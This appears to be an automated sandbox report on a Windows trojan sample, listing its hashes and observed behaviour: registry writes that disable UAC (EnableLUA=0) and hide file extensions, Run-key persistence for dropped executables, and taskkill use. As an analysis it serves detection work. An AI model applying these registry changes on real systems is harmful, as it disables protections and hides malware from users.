10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0

Analysis

max time kernel
152s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2022 21:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Size

213KB
MD5

9246f749d1f6df1856a5f70f1a20fd30
SHA1

adf16a1cc1ff97c5e7418d9fae22bdf8aad20bf2
SHA256

10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
SHA512

f1fc3e8aa77a7d1ce078a69290714a6eef06e4fa8907313041475d151f35423b2a547593e77a0a97246e8bcc1d587b3a38e18c5f7df125a7e092e4408d1e876f
SSDEEP

6144:R88HEHyWldQMPnaewqzqIJkUjAEyFo16IEXnvlzjdWJnFZ:R88HEt+FeRMvl8FZ

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Executes dropped EXE 6 IoCs

Processes:

xsMYUowA.exeEAwYIQgk.exexsMYUowA.exeEAwYIQgk.exexsMYUowA.exeEAwYIQgk.exe

pid process

4680 xsMYUowA.exe
2648 EAwYIQgk.exe
4260 xsMYUowA.exe
5000 EAwYIQgk.exe
3132 xsMYUowA.exe
4884 EAwYIQgk.exe

pid	process
4680	xsMYUowA.exe
2648	EAwYIQgk.exe
4260	xsMYUowA.exe
5000	EAwYIQgk.exe
3132	xsMYUowA.exe
4884	EAwYIQgk.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exexsMYUowA.exeEAwYIQgk.exexsMYUowA.exeEAwYIQgk.exexsMYUowA.exeEAwYIQgk.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	xsMYUowA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	EAwYIQgk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	xsMYUowA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	EAwYIQgk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xsMYUowA.exe = "C:\\Users\\Admin\\umcwocEU\\xsMYUowA.exe"	xsMYUowA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\EAwYIQgk.exe = "C:\\ProgramData\\saEgQgMs\\EAwYIQgk.exe"	EAwYIQgk.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4152 taskkill.exe
4364 taskkill.exe
624 taskkill.exe
4480 taskkill.exe

pid	process
4152	taskkill.exe
4364	taskkill.exe
624	taskkill.exe
4480	taskkill.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

pid	process
1160	reg.exe
2692	reg.exe
3972	reg.exe
4828	reg.exe
4380	reg.exe
4760	reg.exe
2384	reg.exe
1788	reg.exe
4284	reg.exe
4640	reg.exe
1372	reg.exe
1308	reg.exe
3876	reg.exe
3936	reg.exe
3212	reg.exe
400	reg.exe
1492	reg.exe
3212	reg.exe
3904	reg.exe
2108	reg.exe
5100	reg.exe
4368	reg.exe
592	reg.exe
1500	reg.exe
2756	reg.exe
3212	reg.exe
1492	reg.exe
3100	reg.exe
2568	reg.exe
2656	reg.exe
896	reg.exe
3792	reg.exe
3728	reg.exe
3644	reg.exe
4692	reg.exe
2168	reg.exe
3704	reg.exe
3416	reg.exe
4268	reg.exe
4284	reg.exe
2084	reg.exe
2744	reg.exe
748	reg.exe
4660	reg.exe
668	reg.exe
440	reg.exe
1388	reg.exe
4008	reg.exe
992	reg.exe
2352	reg.exe
1880	reg.exe
2068	reg.exe
3040	reg.exe
2240	reg.exe
4360	reg.exe
2704	reg.exe
4964	reg.exe
2004	reg.exe
3640	reg.exe
1560	reg.exe
4236	reg.exe
3624	reg.exe
3328	reg.exe
4148	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

